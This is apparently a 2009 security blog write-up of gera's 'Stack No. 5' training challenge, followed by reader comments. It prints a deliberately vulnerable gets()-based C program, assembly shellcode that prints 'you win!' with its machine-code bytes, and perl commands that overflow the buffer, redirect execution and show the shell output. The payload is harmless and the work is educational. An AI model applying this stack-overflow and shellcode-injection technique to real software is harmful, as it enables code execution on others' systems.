xorl %eax, %eax

Warming up on Stack No. 5

with 5 comments

This is the last gera’s warming up challenge, the code is exactly the same as it was on the 4th:

/* stack5-stdin.c                               *
 * specially crafted to feed your brain by gera */

#include <stdio.h>

int main() {
        int cookie;
        char buf[80];

        printf("buf: %08x cookie: %08xn", &buf, &cookie);
        gets(buf);

        if (cookie == 0x000d0a00)
                printf("you loose!\n");
}

Let’s exploit this using the usual way… I wrote the following straightforward ‘you win!‘ shellcode:

.globl _start
_start:

jmp heh

go_back:
xorl %eax, %eax
xorl %ebx, %ebx
xorl %edx, %edx
movb $4, %al
movb $9, %dl
popl %ecx
movb $1, %bl
int $0x80
xorl %eax, %eax
incl %eax
int $0x80
heh:
   call go_back
msg:
  .ascii "you win!\n"

This translates to the following machine code:

\xeb\x14\x31\xc0\x31\xdb\x31\xd2\xb0\x04\xb2\x09\x59\xb3\x01\xcd\x80
\x31\xc0\x40\xcd\x80
\xe8\xe7\xff\xff\xff\x79\x6f\x75\x20\x77\x69\x6e\x21\x0a

Now… Just:

sh-3.2$ export XORL=`perl -e 'print "\x90" x 313 . "\xeb\x14\x31\xc0\x31\xdb\x31\xd2\xb0\x04\xb2\x09\x59\xb3\x01\xcd\x80\x31\xc0\x40\xcd\x80\xe8\xe7\xff\xff\xff\x79\x6f\x75\x20\x77\x69\x6e\x21\x0a"'`
sh-3.2$ ./g XORL 
XORL @ 0xbffff738 
sh-3.2$ perl -e 'print "A" x 88 . "\x38\xf7\xff\xbf"' | ./stack5
buf: bffff6c4 cookie: bffff714
you win!
sh-3.2$

Written by xorl

January 3, 2009 at 14:57

5 Responses

Subscribe to comments with RSS.

  1. Heya xorl, maybe you could paste some more stuff centric to beginners so we can learn to do what you do (Some of us just look at your stuff in shock and awe, and have no idea go _start_) ?

    I guess knowing Perl, C and assembler is necessary?

    thanks

    ~exe

    exe

    November 3, 2009 at 23:18

  2. Well, I write just public vulnerabilities’ analysis lately. Not that much about exploit development.

    If I had more free time I would probably make some new category for explaining various exploitation techniques for both user and kernel space vulnerabilities but since I don’t have free time to do so I’m only writing about bugs.

    Well, assembly is definitely useful regardless of the high level language that you’re using. C and C++ are widely used too, so you’ll have to learn them if you’re interested in code auditing.

    Perl is just a scripting language, nothing really special. You can use any scripting language you like in most cases.

    xorl

    November 4, 2009 at 00:18

  3. Thanks for the response! I’ll get on the ASM / C horse asap (Currently looking for books on either, any recommendations?) I’ve also decided to look into Python, being as it’s very nice and simple.

    Thanks
    ~exe

    exe

    November 4, 2009 at 00:50

  4. Well, there are so many good books…
    On assembly, one I have read and found beautiful was Richard Bloom’s “Professional Assembly Language”.
    Now, regarding the C programming books we had a discussion a few months ago here:
    https://xorl.wordpress.com/2009/05/30/book-intel-software-developers-manual-vol-1/#comment-190

    xorl

    November 4, 2009 at 07:20

  5. Nice solution. I found Gera’s challenges through your blog.

    In this one, I just injected “you win!” code into buf (the shellcode for that is no more than 43 bytes). Then I overwritten the return address of the main() function with the address of buf. I just didn’t manage to pass a newline character after the string due to gets().

    Cheers.

    Gatoni

    December 17, 2010 at 05:47


Leave a Reply

Fill in your details below or click an icon to log in:

WordPress.com Logo

You are commenting using your WordPress.com account. Log Out / Change )

Twitter picture

You are commenting using your Twitter account. Log Out / Change )

Facebook photo

You are commenting using your Facebook account. Log Out / Change )

Google+ photo

You are commenting using your Google+ account. Log Out / Change )

Connecting to %s